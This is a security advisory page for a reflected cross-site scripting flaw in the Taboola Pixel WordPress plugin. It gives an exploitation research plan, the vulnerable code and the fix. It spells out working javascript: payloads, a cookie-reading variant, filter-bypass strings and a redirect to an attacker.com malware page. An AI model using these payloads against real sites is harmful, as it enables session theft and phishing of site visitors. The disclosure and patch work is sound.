Taboola Pixel <= 1.1.4 - Reflected Cross-Site Scripting
Description
The Taboola Pixel plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 1.1.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NTechnical Details
<=1.1.4What Changed in the Fix
Changes introduced in v1.1.5
Source Code
WordPress.org SVN# Exploitation Research Plan - CVE-2026-32545 ## 1. Vulnerability Summary The **Taboola Pixel** plugin for WordPress (versions <= 1.1.4) contains a reflected Cross-Site Scripting (XSS) vulnerability. The flaw exists in the standalone HTML file `assets/loading.html`. This file contains JavaScript lo…
Show full research plan
Exploitation Research Plan - CVE-2026-32545
1. Vulnerability Summary
The Taboola Pixel plugin for WordPress (versions <= 1.1.4) contains a reflected Cross-Site Scripting (XSS) vulnerability. The flaw exists in the standalone HTML file assets/loading.html. This file contains JavaScript logic designed to redirect users to a URL provided via a query parameter. However, the script fails to sanitize the input or validate the protocol of the redirect URL before assigning it to window.location.href. An attacker can provide a javascript: URI, which the browser will execute in the context of the WordPress site's origin.
2. Attack Vector Analysis
- Vulnerable Endpoint:
/wp-content/plugins/taboola-pixel/assets/loading.html - Vulnerable Parameter:
url(GET parameter) - Authentication Required: None (Unauthenticated)
- Preconditions: The plugin must be installed and the
assets/loading.htmlfile must be accessible (standard for WordPress plugin directories). - Payload Type:
javascript:protocol handler.
3. Code Flow
- A user (or victim) navigates to:
[target]/wp-content/plugins/taboola-pixel/assets/loading.html?url=[payload] - The browser loads
assets/loading.htmland executes the embedded script. - The script calls
getParameterByName('url'). - Inside
getParameterByName:- It retrieves the query string using
window.location.href. - A regular expression
/[?&]url(=([^&#]*)|&|#|$)/extracts the value of theurlparameter. - The value is passed through
decodeURIComponent().
- It retrieves the query string using
- Back in the main script block, the variable
redirectUrlnow holds the decoded attacker input. - The script checks
if (redirectUrl). - If true, a
setTimeoutis triggered to executewindow.location.href = redirectUrl;after 100ms. - If
redirectUrlis ajavascript:string, the browser interprets this as a command to execute script in the current window's context.
4. Nonce Acquisition Strategy
No nonce is required.
The vulnerability is located in a static HTML file (assets/loading.html) that executes entirely on the client side using JavaScript. It does not interact with the WordPress PHP backend, admin-ajax.php, or the REST API for its primary execution logic, thus bypassing all WordPress server-side security controls like nonces or capability checks.
5. Exploitation Strategy
The goal is to demonstrate script execution in the context of the WordPress site.
Step-by-Step Plan:
- Construct Payload: Create a simple payload to prove execution, such as
javascript:alert(document.domain). - URL Encoding: The payload must be URL-encoded to ensure it passes through the
getParameterByNameregex correctly.javascript:alert(document.domain)->javascript%3Aalert(document.domain)
- Execute Request: Use the
browser_navigatetool to visit the vulnerable page with the payload. - Confirm Execution: Use
browser_evalto check if a specific side-effect occurred or simply observe the page behavior.
Target URL:
GET /wp-content/plugins/taboola-pixel/assets/loading.html?url=javascript:console.log('XSS_SUCCESS_'+document.domain)
6. Test Data Setup
- Plugin Installation: Ensure the
taboola-pixelplugin (v1.1.4) is installed and activated. - File Verification: Verify the file exists at the expected path:
wp eval "echo file_exists(WP_PLUGIN_DIR . '/taboola-pixel/assets/loading.html') ? 'exists' : 'missing';"
7. Expected Results
- The browser will navigate to the
loading.htmlpage. - After 100ms, the
setTimeoutcallback will execute. - The
window.location.hrefassignment will trigger thejavascript:payload. - The console will display
XSS_SUCCESS_[site_domain].
8. Verification Steps
- Browser Log Check: After navigating to the URL, use the browser tool to inspect console logs for the string
XSS_SUCCESS_. - Manual Confirmation: If using an interactive browser, an alert box should appear showing the site's domain.
9. Alternative Approaches
- Cookie Exfiltration: If the site does not use
HttpOnlyfor all cookies, attempt to log the cookies:url=javascript:console.log(document.cookie)
- Bypassing Basic Filters: If a simple
javascript:is blocked by a browser-level filter (unlikely for this specific sink), try:url=javascript://%0Aalert(1)(Using a comment and newline)url=JaVaScRiPt:alert(1)(Case sensitivity test)
- Redirection to Malicious Site: To demonstrate the "Reflected" nature and redirect impact:
url=https://attacker.com/malware.html(Phishing vector)
Summary
The Taboola Pixel plugin for WordPress is vulnerable to unauthenticated Reflected Cross-Site Scripting (XSS) via the 'url' parameter in the standalone assets/loading.html file. This occurs because the plugin fails to validate the protocol of the redirect URL before assigning it to window.location.href, allowing attackers to execute arbitrary JavaScript using the javascript: protocol.
Vulnerable Code
// assets/loading.html lines 7-14 function getParameterByName(name, url = window.location.href) { name = name.replace(/[\[\]]/g, '\\$&'); var regex = new RegExp('[?&]' + name + '(=([^&#]*)|&|#|$)'), results = regex.exec(url); if (!results) return null; if (!results[2]) return ''; return decodeURIComponent(results[2].replace(/\+/g, ' ')); } --- // assets/loading.html lines 17-25 // Get the redirect URL from the query parameter var redirectUrl = getParameterByName('url'); // Wait 100ms and then redirect if (redirectUrl) { setTimeout(function() { window.location.href = redirectUrl; }, 100); }
Security Fix
+ // Validate the URL protocol to prevent javascript: XSS\n+ function isSafeUrl(url) {\n+ try {\n+ var parsed = new URL(url, window.location.href);\n+ return parsed.protocol === 'http:' || parsed.protocol === 'https:';\n+ } catch (e) {\n+ return false;\n+ }\n+ }\n+\n // Wait 100ms and then redirect\n- if (redirectUrl) {\n+ if (redirectUrl && isSafeUrl(redirectUrl)) {\n setTimeout(function() {\n window.location.href = redirectUrl;\n }, 100);
Exploit Outline
An unauthenticated attacker can exploit this vulnerability by tricking a victim into visiting a specially crafted URL pointing to the plugin's loading.html file. The attack endpoint is /wp-content/plugins/taboola-pixel/assets/loading.html. The attacker provides a payload in the 'url' parameter using the 'javascript:' protocol (e.g., ?url=javascript:alert(document.domain)). When the page loads, the client-side JavaScript extracts the 'url' parameter and, after a 100ms delay, assigns it to window.location.href, causing the browser to execute the injected JavaScript in the context of the site.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.